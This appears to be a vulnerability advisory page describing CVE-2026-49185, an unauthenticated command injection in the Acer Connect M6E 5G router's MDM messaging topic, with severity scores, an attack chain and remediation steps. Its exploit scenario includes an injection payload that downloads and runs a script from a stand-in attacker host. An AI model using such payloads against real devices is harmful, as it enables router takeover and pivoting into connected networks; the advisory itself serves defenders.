Skip to main content

Acer Connect M6E EUVDEUVD-2026-34199

| CVE-2026-49185 CRITICAL
OS Command Injection (CWE-78)
2026-06-04 Acer GHSA-78x5-76fx-mcp6
10.0
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
10.0 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 04, 2026 - 06:15 vuln.today
CVSS changed
Jun 04, 2026 - 04:22 NVD
10.0 (CRITICAL)
CVE Published
Jun 04, 2026 - 02:55 nvd
UNKNOWN (no severity yet)

DescriptionCVE.org

The FieldX MDM adb messaging topic passes unverified payloads directly into Runtime.exec(), allowing command/instruction injection.

AnalysisAI

Unauthenticated remote command injection in Acer Connect M6E 5G Portable WiFi Router (firmware ≤ M6E_AI_1.00.000019) allows attackers to inject OS commands via the FieldX MDM adb messaging topic, which forwards unverified payloads to Runtime.exec(). The CVSS 4.0 score of 10.0 with network attack vector and no authentication required indicates a critical, trivially exploitable flaw; no public exploit identified at time of analysis but the simplicity of the bug pattern makes weaponization straightforward.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach router MDM message bus
Delivery
Publish crafted adb topic message
Exploit
Payload injected into Runtime.exec()
Execution
Shell metacharacters execute attacker commands
Persist
Gain root on router firmware
Impact
Pivot to connected LAN clients

Vulnerability AssessmentAI

Exploitation Network reachability to the router's FieldX MDM messaging endpoint (the adb topic) on an affected Acer Connect M6E running firmware ≤ M6E_AI_1.00.000019 - no authentication, no user interaction, and no special configuration are required per the CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Every signal points to maximum priority: CVSS 4.0 base score 10.0 with AV:N/AC:L/AT:N/PR:N/UI:N (network, low complexity, no auth, no user interaction) and full High impact across confidentiality, integrity, availability - plus subsequent-system (SC:H/SI:H/SA:H) impact indicating compromise can propagate beyond the router itself into connected client networks. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker on the same network segment as the router - or reaching it over the internet if WAN-side management is exposed - publishes a crafted message to the FieldX MDM adb topic containing shell metacharacters such as `;wget http://attacker/x;sh x;`, which the receiver passes verbatim to Runtime.exec() and executes as the MDM daemon. The attacker gains a root-level shell on the router, can intercept or modify traffic for every connected client, and pivots from the portable hotspot into whichever corporate or personal LAN it bridges.
Remediation Consult the Acer advisory at https://community.acer.com/en/kb/articles/19707 and upgrade the Connect M6E firmware to the version released after M6E_AI_1.00.000019 - the input data does not name an exact fixed build, so Patch available per vendor advisory; verify the post-fix version string with Acer before deployment. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Identify all Acer Connect M6E 5G routers in your environment and determine firmware versions (vulnerable if ≤ M6E_AI_1.00.000019); isolate or disconnect any affected units from production networks. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-49190 CRITICAL
9.4 Jun 04

Command injection in the Acer Connect M6E 5G Portable WiFi Router allows authenticated remote attackers to install arbit

CVE-2026-49194 CRITICAL
9.4 Jun 04

Authentication bypass in the Acer Connect M6E 5G Portable WiFi Router allows low-privileged remote attackers to reach a

CVE-2026-49191 CRITICAL
9.3 Jun 04

Authentication bypass in the Acer Connect M6E 5G Portable WiFi Router's M3WebServer production build exposes hard-coded

CVE-2026-50214 CRITICAL
9.3 Jun 04

Authentication bypass in the Acer Connect M6E 5G Portable WiFi Router (firmware ≤ M6E_AI_1.00.000019) allows remote atta

CVE-2026-50209 CRITICAL
9.3 Jun 04

Privilege escalation via MDM endpoint hijack in the Acer Connect M6E 5G Portable WiFi Router (firmware ≤M6E_AI_1.00.0000

CVE-2026-50208 CRITICAL
9.2 Jun 04

Cryptographic weaknesses in the Acer Connect M6E 5G Portable WiFi Router (firmware versions through M6E_AI_1.00.000019)

CVE-2026-50205 HIGH
8.8 Jun 04

Sensitive information disclosure in the Acer Connect M6E 5G Portable WiFi Router exposes cleartext SMTP authentication p

CVE-2026-49202 HIGH
8.8 Jun 04

Unauthenticated exposure of internal multimedia session archives in the Acer Connect M6E 5G Portable WiFi Router lets re

CVE-2026-50211 HIGH
8.8 Jun 04

Exposed factory diagnostics in Acer Connect M6E 5G Portable WiFi Router (firmware M6E_AI_1.00.000019 and earlier) allow

CVE-2026-50225 HIGH
8.8 Jun 04

Database flooding via unauthenticated abuse of Acer Connect M6E 5G Portable WiFi Router's registration endpoint allows r

CVE-2026-49193 HIGH
8.7 Jun 04

Public exposure of telemetry data affects Acer Connect M6E 5G Portable WiFi Router, where misconfigured cloud storage co

CVE-2026-49187 HIGH
8.7 Jun 04

Information disclosure in the Acer Connect M6E 5G Portable WiFi Router (firmware versions up to and including M6E_AI_1.0

Share

EUVD-2026-34199 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy